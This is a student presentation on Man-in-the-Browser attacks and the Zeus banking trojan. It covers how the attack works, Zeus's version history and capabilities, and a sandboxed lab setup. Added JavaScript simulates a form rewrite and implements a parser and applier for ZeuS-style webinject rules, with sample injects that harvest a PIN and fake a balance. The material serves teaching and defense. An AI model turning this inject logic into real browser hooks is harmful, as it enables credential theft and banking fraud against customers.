Man-In-The-Browser




Aras Tarhan   Manos Dimogerontakis   Mário Almeida   Umit Buyuksahin
OUTLINE

● Man-in-the-Browser Attack
● Method of Attack
● Banking Trojans
● Zeus
● Zeus Installation
● Zeus Configuration Files
● DEMO
Man-in-the-Browser Attack



● Online phishers steal money from online banking customers
● As customers learn to spot plain phishing, attackers move to more
  advanced methods
● One of the latest and most dangerous is Man-in-the-Browser (MITB)
● Malicious code running inside the browser silently modifies the
  actions the user performs
● At the same time it steals confidential information (credentials,
  form contents)
● The user cannot detect the attack: the browser shows the pages the
  user expects, while the traffic underneath has been altered
Method of Attack
● The trojan installs an extension (or hooks the browser's HTTP library)
  into the browser configuration
● Whenever a page is loaded, the extension searches the page's URL
  against a list of known sites targeted for attack
● When the handler detects a page load matching a pattern in its target
  list, it registers a handler for the page's submit button
● When the submit button is pressed, the extension extracts all data
  from all form fields, keeps a copy, and modifies the values it cares
  about (e.g. destination account and amount)
Method of Attack (2)
● The browser sends the form, including the modified values, to the
  server
● The server receives the modified values as a normal request: same
  session, same TLS channel, nothing to distinguish it from a genuine one
● The server performs the transaction and generates a receipt
● The browser receives the receipt for the modified transaction; the
  extension rewrites it before display so that it shows the original
  details the user entered
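The sequence on slides 4 and 5, as an added example that is not part of the original presentation and not code from any banking trojan: a self-contained simulation in which the browser, the hooked extension and the bank server are plain objects. The host bank.example, the account numbers and the receipt text are constructed for the demo.

```javascript
// Added example (not from the slides or from any banking trojan): a
// self-contained simulation of the MITB flow. "bank.example", the account
// numbers and the receipt text are constructed.
"use strict";

// Target list as the extension would carry it: a URL pattern and the form
// fields to rewrite with the attacker's values.
const TARGETS = [
  {
    urlPattern: /^https:\/\/bank\.example\/transfer/i,
    rewrite: { to_account: "MULE-0001", amount: "4900.00" },
  },
];

// The bank only ever sees the request the browser finally sends. It cannot
// tell a rewritten form from a genuine one: same session, same TLS channel.
function bankServer(request) {
  const { to_account, amount } = request.form;
  return {
    status: 200,
    body: `<p>Transferred ${amount} to ${to_account}. Ref 4711.</p>`,
  };
}

// The browser's form submission with the malicious extension hooked in.
// Returns what was sent, what the server answered and what the user saw.
function submitForm(url, form, extension) {
  const original = { ...form }; // values exactly as the user typed them
  const target = extension.targets.find((t) => t.urlPattern.test(url));
  let toSend = form;
  if (target) {
    // Form grabbing: keep a copy of everything the user entered (this is
    // what ends up in the drop server's database).
    extension.grabbed.push({ url, fields: original });
    // Rewrite the fields before the request leaves the browser.
    toSend = { ...form, ...target.rewrite };
  }

  const response = bankServer({ url, form: toSend });

  let displayed = response.body;
  if (target) {
    // Receipt rewrite: swap the injected values back for the originals, so
    // the page shows the transaction the user intended, not the one made.
    for (const [field, injected] of Object.entries(target.rewrite)) {
      displayed = displayed.split(injected).join(original[field]);
    }
  }
  return { original, sent: toSend, response, displayed };
}

// Run one transfer through the hooked browser.
function demo() {
  const extension = { targets: TARGETS, grabbed: [] };
  const result = submitForm(
    "https://bank.example/transfer",
    { to_account: "DE89370400440532013000", amount: "100.00" },
    extension
  );
  return { ...result, grabbed: extension.grabbed };
}

const shown = demo();
console.log("user typed: ", shown.original);
console.log("server got: ", shown.sent);
console.log("server said:", shown.response.body);
console.log("user saw:   ", shown.displayed);
```

The point the simulation makes is that nothing in the request reaching the bank reveals the rewrite, which is why the usual countermeasure is out-of-band confirmation: the transaction details are shown to the user on a second channel that the browser does not control.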
Banking Trojans

A number of Trojan families are used to conduct MITB attacks. Some of
them are so advanced that they have streamlined the process of
committing fraud: they ship with functionality to automate everything
from infection to cash out.

Some known banking trojans:
 ● Zeus
 ● Sinowal (Torpig)
 ● SpyEye
 ● Carberp
 ● Feodo
 ● Tatanga
 ● ...
ZEUS

● aim: steal the victim's credentials
● steals banking information using keystroke logging and form grabbing
● first appeared in 2007, became widespread in 2009 (about 3.6 million
  infected PCs in the US)
● targets only Microsoft Windows
● version used in this project: 2.0.8.9
Evolution of ZEUS

● Version 2.0.0.0, 01.04.2010
   ○ fully compatible with previous versions
   ○ the installation routine on the infected system was rewritten to
     report back to the control panel
   ○ full support for 32-bit applications on 64-bit Windows
   ○ the botnet name is limited to 20 characters and may contain any
     international characters
   ○ full support for nspr4.dll (Firefox), on a par with wininet.dll
     (Internet Explorer), but without HTTP fakes
   ○ the configuration file is read as UTF-8
Evolution of ZEUS

● Version 2.0.1.0, 28.04.2010
   ○ the bot's binding to the user/OS was changed
   ○ minor improvements to HTTP injects
● Version 2.0.2.0, 10.05.2010
   ○ Mozilla Firefox security settings are forcibly changed so that
     HTTP injects work normally
● Version 2.0.3.0, 19.05.2010
   ○ configuration file:
       ■ added the option "StaticConfig.disable_tcpserver"
       ■ added the option "StaticConfig.remove_certs"
   ○ control panel: fixed a bug in the "Botnet-> Bots" module
Evolution of ZEUS

● Version 2.0.5.0, 08.06.2010
   ○ fixed minor bugs in the HTTP grabber
● Version 2.0.6.0, 22.06.2010
   ○ fixed an error that resulted in HTTP injects being disabled
● Version 2.0.8.0, 17.08.2010
   ○ HTTP-inject rules gained two new flags: "I" (case-insensitive
     URL comparison) and "C" (case-insensitive comparison of the page
     context an inject anchors on)
● Version 2.1.0.0, 20.03.2011
   ○ RDP and VNC back-connect added, giving the operator remote desktop
     access to the victim
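The HTTP-inject rules the changelog refers to are written in the ZeuS plain-text webinject format (set_url with flags, then data_before / data_inject / data_after blocks each closed by data_end). What follows is an added example, not the bot's own code and not part of the presentation: a parser for that format and the apply step the inject hook performs on a page, implementing the "I" and "C" flags as the slide describes them. The rules, the pages and the bank.example hostname are constructed; only the `*` wildcard in URL masks is handled, and case folding assumes ASCII context.

```javascript
// Added example (not ZeuS code): a parser for the bot's plain-text
// webinject rules and the apply step the HTTP-inject hook performs on a
// page. Rules, pages and the bank.example hostname are constructed.
"use strict";

// Constructed webinjects. Flags: I = compare the URL case-insensitively,
// C = compare the data_before/data_after context case-insensitively (both as
// on the slide). G and P (apply to GET/POST) are parsed but ignored here.
const SAMPLE_WEBINJECTS = `
set_url https://bank.example/login* GPI
data_before
<input name="pass">
data_end
data_inject
<input name="pin" placeholder="Confirm PIN">
data_end
data_after
data_end

set_url */account* GPC
data_before
<div id="balance">
data_end
data_inject
1,000.00
data_end
data_after
</div>
data_end
`;

// URL mask to RegExp. Assumption: only '*' (any run of characters) is a
// wildcard; everything else is literal.
function maskToRegex(mask, ignoreCase) {
  const parts = mask.split("*").map((s) => s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&"));
  return new RegExp("^" + parts.join(".*") + "$", ignoreCase ? "i" : "");
}

// Parse rules into [{ mask, flags, injects: [{ before, inject, after }] }].
function parseWebinjects(text) {
  const rules = [];
  let block = null; // "before" | "inject" | "after" while inside a data_* block
  let buf = [];
  const rule = () => rules[rules.length - 1];
  const triplet = () => rule().injects[rule().injects.length - 1];
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (block) {
      if (line === "data_end") { triplet()[block] = buf.join("\n"); block = null; }
      else buf.push(raw);
      continue;
    }
    if (line === "") continue;
    if (line.startsWith("set_url ")) {
      const [, mask, flags = ""] = line.split(/\s+/);
      rules.push({ mask, flags, injects: [] });
    } else if (/^data_(before|inject|after)$/.test(line)) {
      if (!rules.length) throw new Error(`${line} before any set_url`);
      // each data_before opens a new before/inject/after triplet
      if (line === "data_before" || !rule().injects.length) {
        rule().injects.push({ before: "", inject: "", after: "" });
      }
      block = line.slice("data_".length);
      buf = [];
    } else {
      throw new Error("unexpected line: " + raw);
    }
  }
  if (block) throw new Error(`unterminated data_${block}`);
  return rules;
}

// Apply every rule whose mask matches the URL. Case folding (flag C) assumes
// ASCII context, so offsets in the folded copy match the original page.
function applyInjects(rules, url, html) {
  let out = html;
  for (const { mask, flags, injects } of rules) {
    if (!maskToRegex(mask, flags.includes("I")).test(url)) continue;
    const norm = flags.includes("C") ? (s) => s.toLowerCase() : (s) => s;
    for (const { before, inject, after } of injects) {
      const hay = norm(out);
      const start = before ? hay.indexOf(norm(before)) : 0; // empty: page start
      if (start < 0) continue;                                 // anchor not found
      const injectAt = start + before.length;
      // empty data_after = pure insertion; otherwise the text between the
      // two anchors is replaced by data_inject
      const end = after ? hay.indexOf(norm(after), injectAt) : injectAt;
      if (end < 0) continue;
      out = out.slice(0, injectAt) + inject + out.slice(end);
    }
  }
  return out;
}

const RULES = parseWebinjects(SAMPLE_WEBINJECTS);
const LOGIN_PAGE = '<form action="/login"><input name="user"><input name="pass"><button>Go</button></form>';
console.log(applyInjects(RULES, "https://BANK.example/Login?r=1", LOGIN_PAGE));
console.log(applyInjects(RULES, "https://bank.example/account", '<DIV ID="balance">5,100.00</DIV>'));
```

The first rule adds a "PIN" field to the login form (the classic credential-harvesting inject) and matches the mixed-case URL only because of the I flag; the second rewrites the displayed balance and finds its anchors in upper-case markup only because of the C flag. Because the injection happens on the page after TLS has been stripped inside the browser, neither the bank nor the network sees the modified HTML.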
Zeus - Capabilities

● reports OS information
● executes operator commands such as reboot, shutdown, log off and
  killing the OS
● takes screenshots
● downloads and executes a script sent by the operator
● searches files on the victim
● every command and its status can be viewed in the control panel on
  the server
Used Environments

● Virtual Machine

   ○ isolates the malware from the host and adds a significant layer of
     safety
   ○ the C&C server and the client to be infected run in separate
     virtual machines
   ○ software: Oracle VirtualBox 4.1.6 for Windows hosts
   ○ each VM has two network adapters: host-only, for traffic between
     server and client, and NAT for outside internet access (the NAT
     adapter lets the infected VM reach the real internet, so the bot's
     C&C URL must point at the host-only address of the server)
● Operating System
   ○ software: Microsoft Windows XP Service Pack 3
   ○ chosen because the Zeus kit we obtained builds and runs on Windows
Used Environments

● Server and Database
   ○ manages the bots running on the infected clients
   ○ receives the information the bots report back
   ○ stores the data stolen from the victims
   ○ software: XAMPP 1.7.7, including
       ■ Apache 2.2.21
       ■ MySQL 5.5.16
       ■ PHP 5.3.8
       ■ phpMyAdmin 3.4.5
Zeus Installation
Demo